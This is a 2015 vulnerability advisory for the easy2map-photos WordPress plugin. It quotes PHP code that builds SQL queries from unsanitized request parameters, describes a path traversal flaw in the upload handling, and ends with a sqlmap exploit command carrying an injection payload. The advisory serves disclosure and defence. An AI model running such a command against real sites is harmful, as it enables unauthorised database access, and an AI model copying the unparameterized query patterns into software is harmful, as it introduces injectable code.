Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-08
Download Site: https://wordpress.org/plugins/easy2map-photos
Vendor: Steven Ellis
Vendor Notified: 2015-06-08, fixed in v1.1.0
Vendor Contact: https://profiles.wordpress.org/stevenellis/
Advisory: http://www.vapid.dhs.org/advisory.php?v=130
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.
Vulnerability:
The following lines in includes/Functions.php are vulnerable to SQL injection attack because they aren’t parameterized or sanitizing user input.

48         $wpdb->query(sprintf("UPDATE $mapsTable
49         SET PolyLines = '%s'
50         WHERE ID = '%s';", $PolyLines, $mapID));
218             $wpdb->query(sprintf("
219                 UPDATE $mapsTable
220                 SET TemplateID = '%s',
221                     MapName = '%s',
222                     Settings = '%s',
223                     CSSValues = '%s',
224                     CSSValuesPhoto = '%s',
225                     CSSValuesMap = '%s',
226                     MapHTML = '%s',
227                     IsActive = 1
228                 WHERE ID = %s;",
229                     $_REQUEST['mapTemplateName'],
230                     $_REQUEST['mapName'],
231                     urldecode($_REQUEST['mapSettingsXML']),
232                     urldecode($_REQUEST["parentCSSXML"]),
233                     urldecode($_REQUEST["photoCSSXML"]),
234                     urldecode($_REQUEST["mapCSSXML"]),
235                     urldecode($_REQUEST["mapHTML"]), $mapID));


238             //this is a map insert
239             if (!$wpdb->query(sprintf("
240             INSERT INTO $mapsTable(
241                 TemplateID,
242                 MapName,
243                 DefaultPinImage,
244                 Settings,
245                 LastInvoked,
246                 PolyLines,
247                 CSSValues,
248                 CSSValuesPhoto,
249                 CSSValuesMap,
250                 MapHTML,
251                 IsActive
252             ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'    , 0);",
253                     $_REQUEST['mapTemplateName'],
254                     $_REQUEST['mapName’]


331         $wpdb->query(sprintf("
332             UPDATE $mapsTable
333             SET MapName = '%s'
334             IsActive = 1
335             WHERE ID = %s;",
336                 $_REQUEST['mapName'],
337                 $mapID));

Also

In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:

   if (!file_exists($imagesDirectory)) {
       mkdir($imagesDirectory);
   }

CVEID: 2015-4615 2015-4617
OSVDB:
Exploit Code:
  • $ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3